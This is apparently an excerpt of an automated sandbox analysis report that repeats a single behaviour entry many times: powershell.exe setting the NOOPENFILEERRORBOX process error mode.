                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
